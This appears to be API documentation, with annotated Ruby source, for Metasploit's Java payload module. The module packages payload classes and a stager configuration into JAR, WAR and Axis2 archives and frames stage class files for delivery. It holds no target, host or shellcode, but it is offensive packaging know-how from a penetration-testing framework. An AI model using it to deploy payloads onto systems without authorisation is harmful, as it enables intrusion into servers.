Module: Msf::Payload::Java

Included in:
BindTcp, MeterpreterLoader, ReverseHttp, ReverseTcp
Defined in:
lib/msf/core/payload/java.rb

Defined Under Namespace

Modules: BindTcp, MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp

Instance Method Summary

Instance Method Details

#class_files ⇒ Object

Default to no extra class files



# File 'lib/msf/core/payload/java.rb', line 170

# Extra class files a stager wants bundled into the generated archive.
#
# The archive builders in this module append this list to their built-in
# entries and join each element with '/', so every element is expected to be
# an array of path components such as ['metasploit', 'Payload.class'].
#
# @return [Array] empty by default; stagers supply their own list
def class_files
  []
end

#generate(opts = {}) ⇒ Object

Used by stagers to construct the payload jar file as a String



# File 'lib/msf/core/payload/java.rb', line 34

# Builds the jar via #generate_jar and serializes it with +pack+.
#
# @param opts [Hash] passed through unchanged to #generate_jar
# @return [Object] the result of calling +pack+ on the built jar (the page
#   describes this as the jar file as a String)
def generate(opts={})
  jar = generate_jar(opts)
  jar.pack
end

#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create an Axis2 web service file as a Rex::Zip::Jar. Stagers define a list of class files returned via class_files. The configuration file is created by the payload's #stager_config method.

Parameters:

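  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :app_name (String)

    the service name written to services.xml; a random name is used when omitted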

Returns:

  • (Rex::Zip::Jar)


# File 'lib/msf/core/payload/java.rb', line 133

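# Builds an Axis2 web service archive as a Rex::Zip::Jar.
#
# The archive holds META-INF/services.xml, the two built-in metasploit/*.class
# entries plus anything returned by #class_files, and metasploit.dat holding
# the result of #stager_config.
#
# @param opts [Hash] options; the same hash is handed to #stager_config
# @option opts [String] :app_name service name written into services.xml and
#   passed to +build_manifest+; when absent a name of 8 to 15 characters is
#   requested from Rex::Text.rand_text_alpha_lower
# @return [Rex::Zip::Jar] the populated archive (not yet packed)
# @raise [RuntimeError] if the receiver does not respond to +stager_config+
def generate_axis2(opts={})
  # A bare `raise` surfaces only as "unhandled exception" (or re-raises
  # whatever exception is currently being handled); name the missing hook.
  unless respond_to?(:stager_config)
    raise "#{self.class} must define stager_config to generate an axis2 archive"
  end

  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  # NOTE(review): app_name is interpolated verbatim, without XML escaping, so
  # callers are expected to pass an XML-safe name.
  # The <description> element is filled with 50 to 99 random alphanumerics.
  services_xml = %Q{<service name="#{app_name}" scope="application">
<description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
<parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
<operation name="run">
 <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</operation>
</service>
}

  # Built-in entries first, then whatever the stager contributes.
  paths = [
    [ 'metasploit', 'Payload.class' ],
    [ 'metasploit', 'PayloadServlet.class' ]
  ] + class_files

  zip = Rex::Zip::Jar.new
  zip.add_file('META-INF/', '')
  zip.add_file('META-INF/services.xml', services_xml)
  zip.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    # Source is read from under 'java/'; the archive entry keeps the
    # relative path given by path_parts.
    path = ['java', path_parts].flatten.join('/')
    contents = ::MetasploitPayloads.read(path)
    zip.add_file(path_parts.join('/'), contents)
  end

  zip.add_file('metasploit.dat', stager_config(opts))
  zip.build_manifest(:app_name => app_name)

  zip
end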

#generate_default_stage(opts = {}) ⇒ Object



# File 'lib/msf/core/payload/java.rb', line 20

# Builds the default stage blob from the files listed by #stage_class_files.
#
# Each file is read with MetasploitPayloads.read('java', path) and written as
# a 32-bit big-endian length followed by the file contents; a 32-bit zero
# terminates the sequence.
#
# NOTE(review): the length prefix uses String#length, which equals the byte
# count only if MetasploitPayloads.read returns a binary string; confirm.
#
# @param opts [Hash] accepted for interface compatibility; not read here
# @return [String] the framed class files followed by the terminator
def generate_default_stage(opts={})
  terminator = [0].pack('N')

  framed = stage_class_files.each_with_object('') do |class_path, buffer|
    bytes = MetasploitPayloads.read('java', class_path)
    buffer << [bytes.length, bytes].pack('NA*')
  end

  framed << terminator
end

#generate_jar(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define a list of class files from the class_files method. The configuration file is created by the payload's #stager_config method.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :main_class (String)

    the name of the Main-Class attribute in the manifest. Defaults to "metasploit.Payload"

  • :random (Boolean)

    Set to `true` to randomize the "metasploit" package name.

Returns:

  • (Rex::Zip::Jar)


# File 'lib/msf/core/payload/java.rb', line 48

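# Builds a jar as a Rex::Zip::Jar.
#
# The jar holds metasploit.dat (the result of #stager_config), the built-in
# metasploit/Payload.class entry plus anything returned by #class_files, and
# a manifest whose Main-Class is taken from +opts+.
#
# @param opts [Hash] options; the same hash is handed to #stager_config
# @option opts [String] :main_class Main-Class attribute for the manifest;
#   defaults to "metasploit.Payload"
# @option opts [Boolean] :random when truthy, +add_sub("metasploit")+ is
#   called on the jar (documented on the page as randomizing the
#   "metasploit" package name)
# @return [Rex::Zip::Jar] the populated archive (not yet packed)
# @raise [RuntimeError] if the receiver does not respond to +stager_config+
def generate_jar(opts={})
  # A bare `raise` surfaces only as "unhandled exception" (or re-raises
  # whatever exception is currently being handled); name the missing hook.
  unless respond_to?(:stager_config)
    raise "#{self.class} must define stager_config to generate a jar"
  end

  # Allow changing the jar's Main Class in the manifest so wrappers
  # around metasploit.Payload will work.
  main_class = opts[:main_class] || "metasploit.Payload"

  # Built-in entry first, then whatever the stager contributes.
  paths = [
    [ "metasploit", "Payload.class" ],
  ] + class_files

  jar = Rex::Zip::Jar.new
  jar.add_sub("metasploit") if opts[:random]
  jar.add_file("metasploit.dat", stager_config(opts))
  jar.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    # Source is read from under 'java/'; the archive entry keeps the
    # relative path given by path_parts.
    path = ['java', path_parts].flatten.join('/')
    contents = ::MetasploitPayloads.read(path)
    jar.add_file(path_parts.join('/'), contents)
  end

  jar.build_manifest(:main_class => main_class)

  jar
end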

#generate_stage(opts = {}) ⇒ Object

Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/

The staging protocol expects any number of class files, each prepended with its length, and terminated with a 0:

[ 32-bit big endian length ][ first raw .class file ]
...
[ 32-bit big endian length ][ Nth raw .class file ]
[ 32-bit null ]


# File 'lib/msf/core/payload/java.rb', line 16

# Stage entry point; delegates to #generate_default_stage.
#
# @param opts [Hash] forwarded unchanged
# @return [Object] whatever #generate_default_stage returns for +opts+
def generate_stage(opts={})
  default_stage = generate_default_stage(opts)
  default_stage
end

#generate_war(opts = {}) ⇒ Object

Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :app_name (String)

    the servlet name written to web.xml; a random name is used when omitted



# File 'lib/msf/core/payload/java.rb', line 82

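# Builds a war file as a Rex::Zip::Jar.
#
# Entries added, in order: WEB-INF/, WEB-INF/web.xml, WEB-INF/classes/,
# metasploit/, each class file under its own relative path (the two built-in
# metasploit/*.class entries plus #class_files), and finally
# WEB-INF/classes/metasploit.dat holding the result of #stager_config.
#
# @param opts [Hash] options; the same hash is handed to #stager_config
# @option opts [String] :app_name servlet name substituted for NAME in
#   web.xml; when absent a name of 8 to 15 characters is requested from
#   Rex::Text.rand_text_alpha_lower
# @return [Rex::Zip::Jar] the populated archive (not yet packed)
# @raise [RuntimeError] if the receiver does not respond to +stager_config+
def generate_war(opts={})
  # A bare `raise` surfaces only as "unhandled exception" (or re-raises
  # whatever exception is currently being handled); name the missing hook.
  unless respond_to?(:stager_config)
    raise "#{self.class} must define stager_config to generate a war"
  end

  zip = Rex::Zip::Jar.new

  web_xml = %q{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>NAME</servlet-name>
<servlet-class>metasploit.PayloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>NAME</servlet-name>
<url-pattern>/*</url-pattern>
</servlet-mapping>
</web-app>
}
  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  # The block form inserts app_name literally; a replacement *string* would
  # expand backslash sequences such as \0 that appear in the name.
  # NOTE(review): the name is not XML-escaped, so callers are expected to
  # pass an XML-safe value.
  web_xml = web_xml.gsub('NAME') { app_name }

  # Built-in entries first, then whatever the stager contributes.
  paths = [
    [ "metasploit", "Payload.class" ],
    [ "metasploit", "PayloadServlet.class" ],
  ] + class_files

  zip.add_file('WEB-INF/', '')
  zip.add_file('WEB-INF/web.xml', web_xml)
  zip.add_file("WEB-INF/classes/", "")
  zip.add_file('metasploit/', '') # Create the metasploit dir

  paths.each do |path_parts|
    # Source is read from under 'java/'; the archive entry keeps the
    # relative path given by path_parts.
    path = ['java', path_parts].flatten.join('/')
    contents = ::MetasploitPayloads.read(path)
    zip.add_file(path_parts.join('/'), contents)
  end

  zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts))

  zip
end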

#stage_class_files ⇒ Object

Default to no extra stage class files



# File 'lib/msf/core/payload/java.rb', line 175

# Extra class files that make up the stage.
#
# #generate_default_stage passes each element to
# MetasploitPayloads.read('java', element), so elements are paths relative to
# the 'java' data directory.
#
# @return [Array] empty by default; stages supply their own list
def stage_class_files
  []
end